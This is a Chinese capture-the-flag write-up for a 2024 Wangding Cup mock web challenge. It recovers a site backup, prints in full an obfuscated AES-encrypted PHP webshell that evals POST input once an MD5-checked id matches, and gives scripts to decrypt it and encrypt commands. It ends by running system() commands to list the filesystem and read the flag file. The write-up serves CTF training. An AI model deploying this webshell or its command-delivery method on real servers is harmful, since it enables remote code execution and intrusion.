AES-128-CBC | 网鼎杯20241026模拟 | Web3

undefined2024年10月26日约 638 字大约 2 分钟

尝试扫描目录，可找到wwwroot的备份文件，我们可以将文件下载。

下载任意一个备份文件，解压文件。

找到特征最明显的文件（其他文件开头为大写字母，该文件开头为小写字母）
"describedssTest.php "，将其代码格式化后可得

<?php error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K)
{
  $cipher = 'aes-128-cbc';
  $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
  $result = base64_encode($GLOBALS['v8'] . $encrypted);
  $result = base64_encode($result);
  return $result;
}
function d($D, $K)
{
  $cipher = 'aes-128-cbc';
  $decodedData = base64_decode(base64_decode($D));
  $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
  $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
  return $decrypted;
}
$a8 = trim(d($a8, $p8));
ob_start();
$a8(trim(d($d8, $p8)));
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8);

编写$a8和$b8的解密脚本

<?php 
error_reporting(0); 
header('Content-type: text/html; charset=utf-8'); 
// 定义密钥和IV 
$p8 = '3b7430adaed18facca7b799229138b7b'; 
$v8 = '0329647546905494'; 
// 解密函数 
function d($D, $K) 
{ 
$cipher = 'aes-128-cbc'; 
$decodedData = base64_decode(base64_decode($D)); 
$encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher)); 
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']); 
return $decrypted; 
} 
// 解密 $a8 和 $d8 的内容 
$a8_encrypted = 
'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0='; 
$d8_encrypted = 
'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09'; 
// 解密结果 
$a8_decrypted = d($a8_encrypted, $p8); 
$d8_decrypted = d($d8_encrypted, $p8); 
echo "解密后的 \$a8 内容: " . $a8_decrypted . "\n"; 
echo "解密后的 \$d8 内容: " . $d8_decrypted . "\n"; 
?>

输出的结果为

解密后的 $a8 内容: assert 
解密后的 $d8 内容: @eval("if(md5(@\$_GET['id'])===\$p8){@eval(trim(d(\$_POST['d'],\$p8)));}")

分析代码可得，通过query传入id的md5值为$p8，通过md5爆破可得
id=04c50eb4bc04c76311d03550ee2c1b71
, 当条件为TRUE时，解密d参数然后运行，我们需要传入加密的d参数。

编写加密和解密的代码如下

加密：

<?php 
error_reporting(0); 
header('Content-type: text/html; charset=utf-8'); 
$p8 = '3b7430adaed18facca7b799229138b7b'; 
$a8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0='; 
$d8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09'; 
$v8 = '0329647546905494'; 
 
function e($D, $K) 
{ 
    $cipher = 'aes-128-cbc'; 
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']); 
    $result = base64_encode($GLOBALS['v8'] . $encrypted); 
    $result = base64_encode($result); 
    return $result; 
} 
 
function d($D, $K) 
{ 
    $cipher = 'aes-128-cbc'; 
    $decodedData = base64_decode(base64_decode($D)); 
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher)); 
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']); 
    return $decrypted; 
} 
 
$c = e("此处输入加密文本", $p8); 
echo $c;
?>

解密：

<?php 
error_reporting(0); 
 
header('Content-type: text/html; charset=utf-8'); 
 
$p8 = '3b7430adaed18facca7b799229138b7b'; 
 
$a8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0='; 
 
$d8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09'; 
 
$v8 = '0329647546905494'; 
 
function e($D, $K) 
{ 
$cipher = 'aes-128-cbc'; 
$encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']); 
$result = base64_encode($GLOBALS['v8'] . $encrypted); 
$result = base64_encode($result); 
return $result; 
} 
function d($D, $K) 
{ 
$cipher = 'aes-128-cbc'; 
$decodedData = base64_decode(base64_decode($D)); 
$encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher)); 
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']); 
return $decrypted; 
} 
$c = "此处输入要解密的文本"; 
echo d($c, $p8); 
?>

使用harkbar插件发包, 依次加密以下内容并发包

system("ls -a");
system("ls -a /");

通过遍历根目录，发现特征文件flag.txt

然后加密system("cat /flag.txt");, 传参后解密可获得flag